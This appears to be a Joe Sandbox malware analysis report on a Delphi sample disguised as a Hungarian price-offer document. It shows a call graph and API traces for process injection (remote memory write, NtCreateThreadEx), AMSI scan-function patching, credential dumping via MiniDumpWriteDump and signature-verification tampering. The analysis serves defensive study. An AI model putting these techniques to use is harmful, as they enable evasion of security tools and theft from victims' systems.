35118->35120 35121 29a4530 35119->35121 35123 29a47f8 35119->35123 35126 29a45a0 11 API calls 35121->35126 35128 29a4544 35121->35128 35122 29a4807 35125 29a45a0 11 API calls 35122->35125 35123->35120 35123->35122 35127 29a4530 11 API calls 35123->35127 35124 29a4572 35124->35093 35130 29a4821 35125->35130 35126->35128 35127->35122 35128->35124 35159 29a2c2c 11 API calls 35128->35159 35131 29a4530 11 API calls 35130->35131 35132 29a484d 35131->35132 35132->35093 35135 29a4506 35133->35135 35134 29a452c 35134->35066 35135->35134 35160 29a2c2c 11 API calls 35135->35160 35138 29a4bd9 35137->35138 35145 29a4c09 35137->35145 35139 29a4c02 35138->35139 35141 29a4be5 35138->35141 35148 29a45a0 35139->35148 35147 29a2c44 11 API calls 35141->35147 35143 29a4bf3 35143->35116 35153 29a44dc 35145->35153 35146->35116 35147->35143 35149 29a45c8 35148->35149 35150 29a45a4 35148->35150 35149->35145 35157 29a2c10 11 API calls 35150->35157 35152 29a45b1 35152->35145 35154 29a44fd 35153->35154 35155 29a44e2 35153->35155 35154->35143 35155->35154 35158 29a2c2c 11 API calls 35155->35158 35157->35152 35158->35154 35159->35124 35160->35135 35162 29a4530 11 API calls 35161->35162 35163 29b81ef 35162->35163 35164 29b798c 12 API calls 35163->35164 35165 29b81fc 35164->35165 35166 29b8204 GetModuleHandleA 35165->35166 35167 29b8274 15 API calls 35166->35167 35168 29b8215 GetModuleHandleA 35167->35168 35169 29b8233 35168->35169 35170 29a44dc 11 API calls 35169->35170 35171 29b7dcd 35170->35171 35171->35107 35172->35084 35173 29c3e12 35174 29a4860 11 API calls 35173->35174 35175 29c3e33 35174->35175 35176 29c3e4b 35175->35176 35177 29a47ec 11 API calls 35176->35177 35178 29c3e6a 35177->35178 35179 29c3e82 35178->35179 36724 29b89d0 35179->36724 35184 29a4860 11 API calls 35185 29c3ee0 35184->35185 35186 29c3eeb 35185->35186 35187 29c3ef7 35186->35187 35188 29a4860 11 API calls 35187->35188 35189 29c3f18 35188->35189 35190 29c3f23 35189->35190 35191 29c3f30 35190->35191 35192 29a47ec 11 API calls 35191->35192 35193 29c3f4f 35192->35193 35194 29c3f67 35193->35194 35195 29b89d0 20 API calls 35194->35195 35196 29c3f73 35195->35196 35197 29a4860 11 API calls 35196->35197 35198 29c3f94 35197->35198 35199 29c3f9f 35198->35199 35200 29c3fac 35199->35200 35201 29a47ec 11 API calls 35200->35201 35202 29c3fcb 35201->35202 35203 29c3fe3 35202->35203 35204 29b89d0 20 API calls 35203->35204 35205 29c3fef 35204->35205 35206 29a4860 11 API calls 35205->35206 35207 29c4010 35206->35207 35208 29c401b 35207->35208 35209 29c4028 35208->35209 35210 29a47ec 11 API calls 35209->35210 35211 29c4047 35210->35211 35212 29c4052 35211->35212 35213 29c405f 35212->35213 35214 29b89d0 20 API calls 35213->35214 35215 29c406b 35214->35215 36744 29be358 35215->36744 35218 29c4091 35219 29c40a2 35218->35219 36749 29bdc8c 35219->36749 35222 29a4860 11 API calls 35223 29c40f1 35222->35223 35224 29c40fc 35223->35224 35225 29a47ec 11 API calls 35224->35225 35226 29c4128 35225->35226 35227 29c4133 35226->35227 35228 29b89d0 20 API calls 35227->35228 35229 29c414c 35228->35229 35230 29a4860 11 API calls 35229->35230 35231 29c416d 35230->35231 35232 29a47ec 11 API calls 35231->35232 35233 29c41a4 35232->35233 35234 29c41af 35233->35234 35235 29b89d0 20 API calls 35234->35235 35236 29c41c8 35235->35236 35237 29b88b8 20 API calls 35236->35237 35238 29c41cd 35237->35238 35239 29c41d7 35238->35239 36764 29be678 35239->36764 35242 29a4860 11 API calls 35243 29c4217 35242->35243 35244 29c422f 35243->35244 35245 29a47ec 11 API calls 35244->35245 35246 29c424e 35245->35246 35247 29c4259 35246->35247 35248 29b89d0 20 API calls 35247->35248 35249 29c4272 Sleep 35248->35249 35250 29a4860 11 API calls 35249->35250 35251 29c429d 35250->35251 35252 29c42b5 35251->35252 35253 29a47ec 11 API calls 35252->35253 35254 29c42d4 35253->35254 35255 29c42df 35254->35255 35256 29c42ec 35255->35256 35257 29b89d0 20 API calls 35256->35257 35258 29c42f8 35257->35258 35259 29a4860 11 API calls 35258->35259 35260 29c4319 35259->35260 35261 29c4324 35260->35261 36903 29a46d4 35261->36903 36725 29b89e4 36724->36725 36726 29b81cc 17 API calls 36725->36726 36727 29b8a1d 36726->36727 36728 29b8274 15 API calls 36727->36728 36729 29b8a36 36728->36729 36730 29b7d78 18 API calls 36729->36730 36731 29b8a95 36730->36731 36905 29b8338 36731->36905 36734 29b8abc 36735 29a4500 11 API calls 36734->36735 36736 29b8ac9 36735->36736 36737 29bf094 36736->36737 36739 29bf0b9 36737->36739 36738 29bf0e5 36740 29a44dc 11 API calls 36738->36740 36739->36738 36917 29a46c4 11 API calls 36739->36917 36918 29a4530 11 API calls 36739->36918 36742 29bf0fa 36740->36742 36742->35184 36745 29a4bcc 11 API calls 36744->36745 36746 29be370 36745->36746 36747 29be391 36746->36747 36919 29a49f8 36746->36919 36747->35218 36750 29bdca2 36749->36750 36926 29a4f20 36750->36926 36752 29bdcaa 36753 29bdcca RtlDosPathNameToNtPathName_U 36752->36753 36930 29bdbdc 36753->36930 36755 29bdce6 NtCreateFile 36756 29bdd11 36755->36756 36757 29a49f8 11 API calls 36756->36757 36758 29bdd23 NtWriteFile NtClose 36757->36758 36759 29bdd4d 36758->36759 36931 29a4c60 36759->36931 36762 29a44dc 11 API calls 36763 29bdd5d Sleep 36762->36763 36763->35222 36765 29be681 36764->36765 36765->36765 36766 29a4860 11 API calls 36765->36766 36767 29be6ca 36766->36767 36768 29a47ec 11 API calls 36767->36768 36769 29be6ef 36768->36769 36770 29b89d0 20 API calls 36769->36770 36771 29be70a 36770->36771 36772 29a4860 11 API calls 36771->36772 36773 29be723 36772->36773 36774 29a47ec 11 API calls 36773->36774 36775 29be748 36774->36775 36776 29b89d0 20 API calls 36775->36776 36777 29be763 36776->36777 36778 29a4860 11 API calls 36777->36778 36779 29be77c 36778->36779 36780 29a47ec 11 API calls 36779->36780 36781 29be7a1 36780->36781 36782 29b89d0 20 API calls 36781->36782 36783 29be7bc 36782->36783 36784 29a4860 11 API calls 36783->36784 36785 29be7ee 36784->36785 36786 29b89d0 20 API calls 36785->36786 36787 29be838 36786->36787 36788 29a4860 11 API calls 36787->36788 36789 29be86f 36788->36789 36790 29a47ec 11 API calls 36789->36790 36791 29be894 36790->36791 36792 29b89d0 20 API calls 36791->36792 36793 29be8af 36792->36793 36794 29a4860 11 API calls 36793->36794 36795 29be8c8 36794->36795 36796 29a47ec 11 API calls 36795->36796 36797 29be8ed 36796->36797 36798 29b89d0 20 API calls 36797->36798 36799 29be908 36798->36799 36800 29a4860 11 API calls 36799->36800 36801 29be921 36800->36801 36802 29a47ec 11 API calls 36801->36802 36803 29be946 36802->36803 36804 29b89d0 20 API calls 36803->36804 36805 29be961 36804->36805 36934 29a7f2c 36805->36934 36807 29be985 36938 29b8788 36807->36938 36810 29a4860 11 API calls 36811 29bea0a 36810->36811 36812 29a47ec 11 API calls 36811->36812 36813 29bea3b 36812->36813 36814 29b89d0 20 API calls 36813->36814 36815 29bea5f 36814->36815 36816 29a4860 11 API calls 36815->36816 36817 29bea7b 36816->36817 36818 29a47ec 11 API calls 36817->36818 36819 29beaac 36818->36819 36820 29b89d0 20 API calls 36819->36820 36821 29bead0 36820->36821 36822 29a4860 11 API calls 36821->36822 36823 29beaec 36822->36823 36824 29a47ec 11 API calls 36823->36824 36825 29beb1d 36824->36825 36826 29b89d0 20 API calls 36825->36826 36827 29beb41 36826->36827 36828 29a4860 11 API calls 36827->36828 36829 29beb5d 36828->36829 36830 29a47ec 11 API calls 36829->36830 36831 29beb7b 36830->36831 36950 29b894c LoadLibraryW 36831->36950 36834 29a4860 11 API calls 36835 29bebac 36834->36835 36836 29a47ec 11 API calls 36835->36836 36837 29bebca 36836->36837 36838 29b894c 21 API calls 36837->36838 36839 29bebdf 36838->36839 36840 29a4860 11 API calls 36839->36840 36841 29bebfb 36840->36841 36842 29a47ec 11 API calls 36841->36842 36843 29bec19 36842->36843 36844 29b894c 21 API calls 36843->36844 36845 29bec2e 36844->36845 36846 29a4860 11 API calls 36845->36846 36847 29bec4a 36846->36847 36848 29a47ec 11 API calls 36847->36848 36849 29bec68 36848->36849 36850 29b894c 21 API calls 36849->36850 36851 29bec7d 36850->36851 36852 29beee2 36851->36852 36853 29bec87 36851->36853 36855 29a4500 11 API calls 36852->36855 36854 29a4860 11 API calls 36853->36854 36859 29beca3 36854->36859 36856 29beeff 36855->36856 36857 29a4c60 SysFreeString 36856->36857 36858 29bef0a 36857->36858 36860 29a4500 11 API calls 36858->36860 36862 29a47ec 11 API calls 36859->36862 36861 29bef1a 36860->36861 36863 29a4c60 SysFreeString 36861->36863 36867 29becd4 36862->36867 36864 29bef22 36863->36864 36865 29a4500 11 API calls 36864->36865 36866 29bef2f 36865->36866 36866->35242 36868 29b89d0 20 API calls 36867->36868 36869 29becf8 36868->36869 36870 29a4860 11 API calls 36869->36870 36871 29bed14 36870->36871 36872 29a47ec 11 API calls 36871->36872 36873 29bed45 36872->36873 36874 29b89d0 20 API calls 36873->36874 36875 29bed69 WaitForSingleObject CloseHandle CloseHandle 36874->36875 36876 29a4860 11 API calls 36875->36876 36877 29beda0 36876->36877 36878 29a47ec 11 API calls 36877->36878 36879 29bedbe 36878->36879 36880 29b894c 21 API calls 36879->36880 36881 29bedd3 36880->36881 36882 29a4860 11 API calls 36881->36882 36883 29bedef 36882->36883 36884 29a47ec 11 API calls 36883->36884 36885 29bee0d 36884->36885 36886 29b894c 21 API calls 36885->36886 36887 29bee22 36886->36887 36888 29a4860 11 API calls 36887->36888 36889 29bee3e 36888->36889 36890 29a47ec 11 API calls 36889->36890 36891 29bee5c 36890->36891 36892 29b894c 21 API calls 36891->36892 36893 29bee71 36892->36893 36894 29a4860 11 API calls 36893->36894 36895 29bee8d 36894->36895 36896 29a47ec 11 API calls 36895->36896 36897 29beeab 36896->36897 36898 29b894c 21 API calls 36897->36898 36899 29beec0 36898->36899 36900 29b894c 21 API calls 36899->36900 36901 29beed1 36900->36901 36902 29b894c 21 API calls 36901->36902 36902->36852 36904 29a46da 36903->36904 36906 29a4530 11 API calls 36905->36906 36907 29b835b 36906->36907 36908 29a4860 11 API calls 36907->36908 36909 29b837a 36908->36909 36910 29b81cc 17 API calls 36909->36910 36911 29b838d 36910->36911 36912 29b8274 15 API calls 36911->36912 36913 29b8393 FlushInstructionCache 36912->36913 36914 29b83b9 36913->36914 36915 29a44dc 11 API calls 36914->36915 36916 29b83c1 FreeLibrary 36915->36916 36916->36734 36917->36739 36918->36739 36920 29a49ac 36919->36920 36921 29a45a0 11 API calls 36920->36921 36923 29a49e7 36920->36923 36922 29a49c3 36921->36922 36922->36923 36925 29a2c2c 11 API calls 36922->36925 36923->36746 36925->36923 36927 29a4f3c 36926->36927 36928 29a4f26 SysAllocStringLen 36926->36928 36927->36752 36928->36927 36929 29a4c30 36928->36929 36929->36926 36930->36755 36932 29a4c66 SysFreeString 36931->36932 36933 29a4c74 36931->36933 36932->36933 36933->36762 36935 29a7f3f 36934->36935 36957 29a4a00 36935->36957 36939 29a4530 11 API calls 36938->36939 36940 29b87ab 36939->36940 36941 29a4860 11 API calls 36940->36941 36942 29b87ca 36941->36942 36943 29b81cc 17 API calls 36942->36943 36944 29b87dd 36943->36944 36945 29b8274 15 API calls 36944->36945 36946 29b87e3 CreateProcessAsUserW 36945->36946 36947 29b8827 36946->36947 36948 29a44dc 11 API calls 36947->36948 36949 29b882f 36948->36949 36949->36810 36951 29b89bb 36950->36951 36952 29b8973 GetProcAddress 36950->36952 36951->36834 36953 29b898d 36952->36953 36954 29b89b0 FreeLibrary 36952->36954 36955 29b7d78 18 API calls 36953->36955 36954->36951 36956 29b89a5 36955->36956 36956->36954 36958 29a4a32 36957->36958 36959 29a4a05 36957->36959 36960 29a44dc 11 API calls 36958->36960 36959->36958 36962 29a4a19 36959->36962 36961 29a4a28 36960->36961 36961->36807 36964 29a45cc 36962->36964 36965 29a45a0 11 API calls 36964->36965 36966 29a45dc 36965->36966 36967 29a44dc 11 API calls 36966->36967 36968 29a45f4 36967->36968 36968->36961

                                                                                                                                                  Executed Functions

                                                                                                                                                  Function 029BB118 Relevance: 54.3, APIs: 6, Strings: 24, Instructions: 1829nativethreadCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 6026 29bb118-29bb11b 6027 29bb120-29bb125 6026->6027 6027->6027 6028 29bb127-29bb7b0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29b8594 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 GetModuleHandleW call 29b8274 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 NtOpenProcess call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a2ee0 call 29a2f08 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 6027->6028 6247 29bcd28-29bcf5e call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29b894c * 3 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29b894c * 4 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 6028->6247 6248 29bb7b6-29bb930 call 29b7c10 call 29b7a2c call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 6028->6248 6385 29bcf63-29bcfa0 call 29a4500 * 3 6247->6385 6248->6247 6344 29bb936-29bb966 call 29b58f4 IsBadReadPtr 6248->6344 6344->6247 6357 29bb96c-29bb971 6344->6357 6357->6247 6359 29bb977-29bb993 IsBadReadPtr 6357->6359 6359->6247 6361 29bb999-29bb9a2 6359->6361 6361->6247 6363 29bb9a8-29bb9cd 6361->6363 6363->6247 6364 29bb9d3-29bbb4c call 29b7c10 call 29b7a2c call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 6363->6364 6364->6247 6429 29bbb52-29bbcc8 call 29b7a2c call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 6364->6429 6429->6247 6474 29bbcce-29bbf3e call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29bafd4 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 6429->6474 6547 29bc0dc-29bc23a call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 6474->6547 6548 29bbf44-29bbf45 6474->6548 6634 29bc23c-29bc261 call 29baf24 6547->6634 6635 29bc266-29bca86 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29bafe0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29b7d78 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 GetModuleHandleW call 29b8274 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 NtCreateThreadEx call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 6547->6635 6550 29bbf49-29bc0d6 call 29bafd4 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 6548->6550 6550->6547 6634->6635 6882 29bca8b-29bcd23 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29b894c * 5 call 29a4860 call 29a49a0 call 29a47ec call 29a49a0 call 29b894c call 29a4860 call 29a49a0 call 29a47ec call 29a49a0 call 29b894c call 29a4860 call 29a49a0 call 29a47ec call 29a49a0 call 29b894c call 29a4860 call 29a49a0 call 29a47ec call 29a49a0 call 29b894c call 29b8080 call 29b894c * 2 6635->6882 6882->6247
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 029B89D0: FreeLibrary.KERNEL32(74B20000,00000000,00000000,00000000,00000000,02A2738C,Function_0000662C,00000004,02A2739C,02A2738C,05F5E103,00000040,02A273A0,74B20000,00000000,00000000), ref: 029B8AAA
                                                                                                                                                  • GetModuleHandleW.KERNEL32(ntdll,NtOpenProcess,UacScan,02A27380,029BCFC0,ScanString,02A27380,029BCFC0,ScanBuffer,02A27380,029BCFC0,ScanString,02A27380,029BCFC0,UacScan,02A27380), ref: 029BB3EA
                                                                                                                                                    • Part of subcall function 029B8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,029B82FC,?,?,00000000,00000000,?,029B8215,00000000,KernelBASE,00000000,00000000,029B823C), ref: 029B82C1
                                                                                                                                                    • Part of subcall function 029B8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 029B82C7
                                                                                                                                                    • Part of subcall function 029B8274: GetProcAddress.KERNEL32(?,?), ref: 029B82D9
                                                                                                                                                  • NtOpenProcess.NTDLL(02A27584,001F0FFF,02A27318,02A27330), ref: 029BB4E8
                                                                                                                                                    • Part of subcall function 029A2EE0: QueryPerformanceCounter.KERNEL32 ref: 029A2EE4
                                                                                                                                                    • Part of subcall function 029B7A2C: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 029B7A9F
                                                                                                                                                  • IsBadReadPtr.KERNEL32(211C0000,00000040), ref: 029BB95F
                                                                                                                                                  • IsBadReadPtr.KERNEL32(?,000000F8), ref: 029BB98C
                                                                                                                                                    • Part of subcall function 029B7D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 029B7DEC
                                                                                                                                                  • GetModuleHandleW.KERNEL32(ntdll,NtCreateThreadEx,UacScan,02A27380,029BCFC0,ScanString,02A27380,029BCFC0,047C0000,047C0000,21A60000,30794D5A,ZMy0Z]v0,OpenSession,02A27380,029BCFC0), ref: 029BC807
                                                                                                                                                  • NtCreateThreadEx.NTDLL(02A27560,02000000,02A27318,047DF110,047DF110,00000000,00000000,00000000,00000000,00000000,00000000,ScanBuffer,02A27380,029BCFC0,UacInitialize,02A27380), ref: 029BCA18
                                                                                                                                                    • Part of subcall function 029B894C: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,02A273A8,029BA587,ScanString,02A273A8,029BA93C,ScanBuffer,02A273A8,029BA93C,Initialize,02A273A8,029BA93C,UacScan), ref: 029B8960
                                                                                                                                                    • Part of subcall function 029B894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 029B897A
                                                                                                                                                    • Part of subcall function 029B894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,02A273A8,029BA587,ScanString,02A273A8,029BA93C,ScanBuffer,02A273A8,029BA93C,Initialize), ref: 029B89B6
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AddressHandleLibraryModuleProc$FreeMemoryReadVirtual$AllocateCounterCreateLoadOpenPerformanceProcessQueryThreadWrite
                                                                                                                                                  • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtCreateThreadEx$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$ScanBuffer$ScanString$UacInitialize$UacScan$ZMy0$ZMy0Z]v0$advapi32$bcrypt$dbgcore$ntdll$ntdll
                                                                                                                                                  • API String ID: 341001173-829192164
                                                                                                                                                  • Opcode ID: 174188d90f83e8ea5ea26904750c60cfb55ec1767d2406bddd89ccf34adc2658
                                                                                                                                                  • Instruction ID: e93e0cc975083e44941a1bf894d8df3925df837484a2344ef8e5fe346cc19fb8
                                                                                                                                                  • Opcode Fuzzy Hash: 174188d90f83e8ea5ea26904750c60cfb55ec1767d2406bddd89ccf34adc2658
                                                                                                                                                  • Instruction Fuzzy Hash: 9EF2FD35B002589FDB12EB64DD94BDEB3BAFFC9700F1051F29008AB254DA70AE568F95
                                                                                                                                                  Function 029A5ACC Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 184registrystringlibraryCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 10170 29a5acc-29a5b0d GetModuleFileNameA RegOpenKeyExA 10171 29a5b4f-29a5b92 call 29a5908 RegQueryValueExA 10170->10171 10172 29a5b0f-29a5b2b RegOpenKeyExA 10170->10172 10177 29a5bb6-29a5bd0 RegCloseKey 10171->10177 10178 29a5b94-29a5bb0 RegQueryValueExA 10171->10178 10172->10171 10173 29a5b2d-29a5b49 RegOpenKeyExA 10172->10173 10173->10171 10175 29a5bd8-29a5c09 lstrcpynA GetThreadLocale GetLocaleInfoA 10173->10175 10179 29a5c0f-29a5c13 10175->10179 10180 29a5cf2-29a5cf9 10175->10180 10178->10177 10183 29a5bb2 10178->10183 10181 29a5c1f-29a5c35 lstrlenA 10179->10181 10182 29a5c15-29a5c19 10179->10182 10185 29a5c38-29a5c3b 10181->10185 10182->10180 10182->10181 10183->10177 10186 29a5c3d-29a5c45 10185->10186 10187 29a5c47-29a5c4f 10185->10187 10186->10187 10188 29a5c37 10186->10188 10187->10180 10189 29a5c55-29a5c5a 10187->10189 10188->10185 10190 29a5c5c-29a5c82 lstrcpynA LoadLibraryExA 10189->10190 10191 29a5c84-29a5c86 10189->10191 10190->10191 10191->10180 10192 29a5c88-29a5c8c 10191->10192 10192->10180 10193 29a5c8e-29a5cbe lstrcpynA LoadLibraryExA 10192->10193 10193->10180 10194 29a5cc0-29a5cf0 lstrcpynA LoadLibraryExA 10193->10194 10194->10180
                                                                                                                                                  APIs
                                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000105,029A0000,029CE790), ref: 029A5AE8
                                                                                                                                                  • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,029A0000,029CE790), ref: 029A5B06
                                                                                                                                                  • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,029A0000,029CE790), ref: 029A5B24
                                                                                                                                                  • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 029A5B42
                                                                                                                                                  • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,029A5BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 029A5B8B
                                                                                                                                                  • RegQueryValueExA.ADVAPI32(?,029A5D38,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,029A5BD1,?,80000001), ref: 029A5BA9
                                                                                                                                                  • RegCloseKey.ADVAPI32(?,029A5BD8,00000000,?,?,00000000,029A5BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 029A5BCB
                                                                                                                                                  • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 029A5BE8
                                                                                                                                                  • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 029A5BF5
                                                                                                                                                  • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 029A5BFB
                                                                                                                                                  • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 029A5C26
